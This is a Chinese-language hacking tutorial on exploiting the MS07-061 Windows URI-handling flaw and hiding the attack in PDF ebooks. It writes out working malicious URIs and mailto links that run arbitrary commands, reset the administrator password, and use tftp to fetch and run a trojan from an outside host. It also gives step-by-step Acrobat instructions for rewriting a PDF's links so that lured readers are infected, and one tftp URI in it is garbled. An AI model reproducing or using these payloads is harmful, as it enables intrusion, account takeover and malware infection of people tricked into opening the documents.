技术分析：PDF木马与MS07-061漏洞

    PDF是网上常见的一种电子书格式，在每次打开和查看PDF电子书籍时，有没有想过其中会夹带木马呢？如何利用PDF文档来传播自己的木马？木马是怎么隐身在PDF电子书中的？

    一、“腰斩”——MS07-061漏洞简介与测试

    MS07-061 URI漏洞2007年未爆出的一个漏洞，它是一个URI链接解析漏洞。受MS07-061URI漏洞影响的系统，包括Windows XP SP2及Windows 2003，不过漏洞只会触发安装了IE7.0浏览器的系统，也就是说，此漏洞主要针对IE7浏览器。但是IE7本身不受此漏洞的影响，反到是一些相关的软件，如Skype、Adobe Acrobat Reader、Firefox浏览器、Miranda 等。

    为了便于大家理解此漏洞，先做一个小小的试验。登录QQ，打开QQ发送窗口，向好友发送如下一条消息：http://www.baidu.com%xx../../../../windows/system32/calc.exe".bat

    当好友接收到此消息后，点击其中的链接，如果运行系统中的附件工具“计算器”，则说明系统中未安装MS07-061漏洞补丁。正是由于MS07-061漏洞的存在，所以原本打开百度网页的链接，被从百分号“%”处中间拦腰截断，只执行了后面运行计算器的命令。

    二、死角——MS07-061漏洞的威胁

    经过笔者测试，发现许多系统中都存在着MS07-061漏洞，因而很容易遭受漏洞攻击。一方面是因为此漏洞往往不为许多用户注意，大部分的用户都没有打上此漏洞的补丁；另一方面，则是由于各种漏洞补丁安全工具所造成的。有许多用户为了节约系统资源，往往都关闭了Windows系统的自动更新，而使用第三方的工具，比如360安全卫士工具，快速批量的检测并下载系统漏洞补丁。但是笔者发现，360安全卫士漏掉了MS07-061漏洞补丁，打完了360安全卫士检测出的所有漏洞补丁时，系统依然还存在着MS07-061漏洞！例如在笔者的系统中，360安全卫士未显示MS07-061漏洞，而用“迅雷系统漏洞修复”或QQ医生等工具检测时，则显示有MS07-061漏洞补丁未打（如图2）。

    此外，还有一些用户使用的是一些集成性补丁安装工具，这些工具虽然方便，但是也往往会由于制作者的原因，导致一些补丁未集成在其中，造成系统中存在此漏洞。

    三、攻击利用基础

    在利用MS07-061 URI漏洞进行攻击前，我们先来了解一下URI漏洞链接的构造执行基础。

    1.执行无参数命令

    MS07-061 URI漏洞可以让某个链接打开时，运行系统中的“计算器”，当然同样也能执行任意的命令。例如我们要让URI链接执行打开系统中的命令提示符窗口，则可构造发送如下的URI链接：http:%../../../../windows/system32/cmd.exe".cmd

    这里需要注意的是，在整个URI链接后面一定要加上“.cmd”或“.bat”，当别人在QQ中点击这个链接时，就会自动打开系统中的命令提示符窗口了。由于是在QQ中调用cmd命令打开命令窗口的，因此当前目录为QQ程序目录。

    “.cmd”和“.bat”都能让命令正常执行，其区别在于，前者是将命令作为是以程序命令方式执行的，而后者则bat批处理文件执行。另外，在本例中，执行命令后，打开命令提示符窗口后，提示符窗口会一闪而过自动关闭。如果想让程序执行后不关闭，则可将URI链接改为“http:%../../../../windows\system32\cmd.exe".cmd”。

    2.执行有参数命令

    并不是所有命令都是直接运行的，很可能需要添加参数。命令参数需要放在“.cmd”和双引号“"”之间，并且参数需要用半角双引号封合起来。例如要利用URI漏洞修改管理员用户密码，则可以发送如下URI链接：http:%../../../../windows/system32/net.exe" "user" "administrator" "111111".cmd

    从链接中可以看出，有多个命令参数的话，都用双引号封合，插入到“.cmd”之前。

    3.“mailto”与URI漏洞攻击

    但是此链接不能在QQ中发送攻击，因为在QQ中发送时，中间的空格会被当作为链接终止，因此造成语句不完整。我们只能通过网页之类的方式，来构造URI链接攻击。这里我们使用URI的另一种攻击方式“mailto”。

    我们可以打开记事本，输入如下语句：

    邮件测试1：<A href='mailto:test% ../../../../windows/system32/calc.exe".cmd'>test@binghexijian.com</A><BR>
    邮件测试2：<A href='mailto:test% ../../../../windows/system32/net.exe" "user" "administrator" "111".cmd'>test@binghexijian.com</A>

    在代码中，“mailto”也是一个URI资源标识，用于指定进行邮件撰写发送。然后将文本保存为.html文档，再运行浏览器Firefox 2.0.0.6以下版本，在浏览器中打开刚才的保存的HTML文档。先点击第一个“邮件测试”链接，将会发现又弹出了“计算器”程序窗口。点击第二个“邮件测试”链接，则会弹出命令提示符窗口，提示“命令成功完成”，并迅速关闭，此时已将系统中的管理员用户administrator的密码修改为“111”了。

    用同样的方法，我们可以在邮件链接中写入其它攻击命令，比如开启3389远程控制，或者开启TELNET服务等，以达到入侵的目的。

    3.下载执行木马

    除了直接执行修改管理员或开启服务等命令，还可以让漏洞主机直接下载木马运行。命令行下载木马并执行，需要使用TFTP工具。例如我们上传了一个网页木马，其链接地址为“http://www.xiaoyao.com/test.exe”，那么可通过如下TFTP命令下载：tftp.exe -i www.xiaoyao.com GET test.exe c:\windows\test.com

    命令执行后，则测试文件被下载后存放在C盘根目录下，并重命名为“test.com”。如果构造为URI代码的话，则为：mailto:test%........windowssystem32tftp.exe" "-i" "www.xiaoyao.com" "GET" "test.exe" "c:\test.com".cmd

    另外，还需要一条语句，用以执行下载的文件。语句很简单，直接构造URI为“mailto:test%..\..\..\..\windows\test.com”即可。

    虽然上面我们实现了利用MS07-061漏洞，执行入侵攻击操作，或者下载运行木马，但是在实际的入侵应用中，如何才能诱骗别人点击我们的链接呢？我们就要应用到PDF文档的漏洞了。PDF是由“Adobe Acrobat”制作的，它存在一个攻击漏洞——可以在PDF文档中，利用“Adobe Acrobat”提供的Javascript脚本功能，执行任意攻击命令。

    从网上下载一个有诱惑性的PDF电子书，安装并运行“Adobe Acrobat”，打开一个刚才下载的PDF文件。然后对电子书进行编辑，添加入URI漏洞攻击代码，方法很简单：

    首先，点击菜单“工具”→“高级编辑工具”→“链接工具”命令，页面中所有的URI链接都将被高亮显示。可以选择HTTP链接，也可以选择“mailto”等链接。这里我们以PDF电子书中的作者联系邮箱链接为例，进行修改插马。选择此链接后，链接四周将会显示红色方块，双击后打开属性设置对话框。选择“动作”标签，在其中可看到已添加的“mailto”链接。此链接是正常的书写方式，因此我们要将其修改为MS07-061漏洞攻击方式。

    点击对话框中的“编辑”按钮，将打开编辑对话框。在URL链接地址中输入URI攻击链接，这里为了便于显示攻击效果，因此输入了“mailto:test% ../../../../windows/system32/calc.exe".cmd”。点击确定按钮，关闭编辑对话框，并保存文件。现在再次点击刚才修改过的邮箱链接，将会发现弹出了计算器程序窗口。说明漏洞利用成功。

    用同样的方法，可以直接修改PDF文件中的任意链接，执行攻击性入侵命令，也可以让用户在点击翻阅PDF文档时，自动下载并运行木马程序了！